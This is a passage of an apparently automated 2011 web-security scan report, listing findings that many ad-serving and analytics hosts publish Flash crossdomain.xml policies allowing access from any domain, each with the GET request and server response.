HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 08 Apr 2011 22:43:44 GMT
ETag: "4cd8005-fc-4a06ff54b2800"
Accept-Ranges: bytes
Content-Length: 252
Content-Type: text/xml
Date: Mon, 16 May 2011 02:00:17 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.undertone.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.11. http://adserver.veruta.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.veruta.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adserver.veruta.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 16 May 2011 01:58:38 GMT
Content-Type: text/xml
Content-Length: 211
Last-Modified: Sat, 24 Oct 2009 00:35:22 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-doma
...[SNIP]...

6.12. http://altfarm.mediaplex.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1289502469000"
Last-Modified: Thu, 11 Nov 2010 19:07:49 GMT
Content-Type: text/xml
Content-Length: 204
Date: Mon, 16 May 2011 02:00:28 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

6.13. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Tue, 17 May 2011 01:55:23 GMT
Date: Mon, 16 May 2011 01:55:23 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.14. http://beacon.afy11.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beacon.afy11.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: beacon.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT
Accept-Ranges: bytes
ETag: "e732374a5649c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:36:36 GMT
Connection: close
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.15. http://bp.specificclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bp.specificclick.net

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: text/xml
Content-Length: 194
Date: Mon, 16 May 2011 01:54:10 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

6.16. http://bs.serving-sys.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 16 May 2011 01:57:38 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


6.17. http://cebwa.122.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cebwa.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cebwa.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:08 GMT
Server: Omniture DC/2.0.0
xserver: www379
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.18. http://cimg-1.restorationhardware.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cimg-1.restorationhardware.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cimg-1.restorationhardware.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:22 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "24406b-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=985
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.19. http://customerappreciation.petco.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://customerappreciation.petco.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: customerappreciation.petco.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:24 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "a6de0-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=900
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.20. http://d.xp1.ru4.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 01:58:24 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:32:05 GMT
Content-length: 202
Etag: "ca-4ceae155"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.21. http://data.coremetrics.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://data.coremetrics.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: data.coremetrics.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:52 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT
ETag: "21c4c0-c7-4758765f"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=300, max=851
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.22. http://dis.us.criteo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dis.us.criteo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dis.us.criteo.com

Response

HTTP/1.1 200 OK
Server: nginx
Cache-Control: max-age=31104000
Cache-Control: public
Content-Type: text/xml
Date: Mon, 16 May 2011 01:58:00 GMT
Expires: Thu, 10 May 2012 01:58:00 GMT
Accept-Ranges: bytes
Connection: close
Last-Modified: Wed, 19 Sep 2007 08:50:25 GMT
Content-Length: 360

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

6.23. http://fls.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 15 May 2011 02:39:40 GMT
Expires: Sat, 30 Apr 2011 02:36:16 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 83614
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.24. http://gsicace.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsicace.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gsicace.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:57:11 GMT
Server: Omniture DC/2.0.0
xserver: www398
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.25. http://hire.jobvite.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hire.jobvite.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: hire.jobvite.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 20 Jul 2010 18:27:10 GMT
Accept-Ranges: bytes
ETag: "093692a3928cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:22:20 GMT
Connection: close
Content-Length: 108

...<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

6.26. http://ib.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 17-May-2011 02:01:44 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.27. http://idcs.interclick.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 19 Apr 2011 21:44:21 GMT
Accept-Ranges: bytes
ETag: "7b643f1dafecb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 16 May 2011 02:01:01 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.28. http://marketlive.122.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://marketlive.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: marketlive.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:42 GMT
Server: Omniture DC/2.0.0
xserver: www398
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.29. http://mbox12.offermatica.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mbox12.offermatica.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: mbox12.offermatica.com

Response

HTTP/1.1 200 OK
ETag: W/"201-1304618936000"
Accept-Ranges: bytes
Content-Length: 201
Date: Mon, 16 May 2011 01:53:41 GMT
Connection: close
Last-Modified: Thu, 05 May 2011 18:08:56 GMT
Server: Test & Target
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

6.30. http://media.fastclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.fastclick.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:30 GMT
Server: Apache/2.2.4 (Unix)
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Content-Length: 202
Keep-Alive: timeout=5, max=19993
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.31. http://media.gnc.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.gnc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.gnc.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:34 GMT
Server: Apache/1.3.37 (Unix)
P3P: policyref="http://media.gnc.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Cache-Control: public, max-age=18000
Expires: Mon, 16 May 2011 06:58:34 GMT
Last-Modified: Wed, 06 Oct 2004 16:26:56 GMT
ETag: "c9-41641cd0"
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.32. http://media.gsimedia.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.gsimedia.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.gsimedia.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:56:28 GMT
Server: Apache/1.3.37 (Unix)
P3P: policyref="http://media.gsimedia.net/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Cache-Control: public, max-age=18000
Expires: Mon, 16 May 2011 06:56:28 GMT
Last-Modified: Wed, 06 Oct 2004 16:26:56 GMT
ETag: "c9-41641cd0"
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.33. http://media2.legacy.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media2.legacy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: media2.legacy.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

6.34. http://metrics.brookstone.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.brookstone.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.brookstone.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:55 GMT
Server: Omniture DC/2.0.0
xserver: www287
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.35. http://metrics.ftd.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.ftd.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.ftd.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:37 GMT
Server: Omniture DC/2.0.0
xserver: www400
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.36. http://metrics.gnc.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.gnc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.gnc.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:43 GMT
Server: Omniture DC/2.0.0
xserver: www402
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.37. http://metrics.mcafee.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.mcafee.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.mcafee.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:06:39 GMT
Server: Omniture DC/2.0.0
xserver: www295
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.38. http://metrics.pacsun.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.pacsun.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.pacsun.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:28 GMT
Server: Omniture DC/2.0.0
xserver: www23
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.39. http://metrics.petsmart.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.petsmart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.petsmart.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:15 GMT
Server: Omniture DC/2.0.0
xserver: www500
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.40. http://mlarmani.122.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlarmani.122.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: mlarmani.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:02 GMT
Server: Omniture DC/2.0.0
xserver: www80
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.41. http://o.toshibadirect.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://o.toshibadirect.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: o.toshibadirect.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:56:41 GMT
Server: Omniture DC/2.0.0
xserver: www378
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.42. http://pix04.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Mon, 16 May 2011 02:02:16 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.43. http://r.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Mon, 16 May 2011 01:56:38 GMT
Content-Type: text/xml;charset=UTF-8
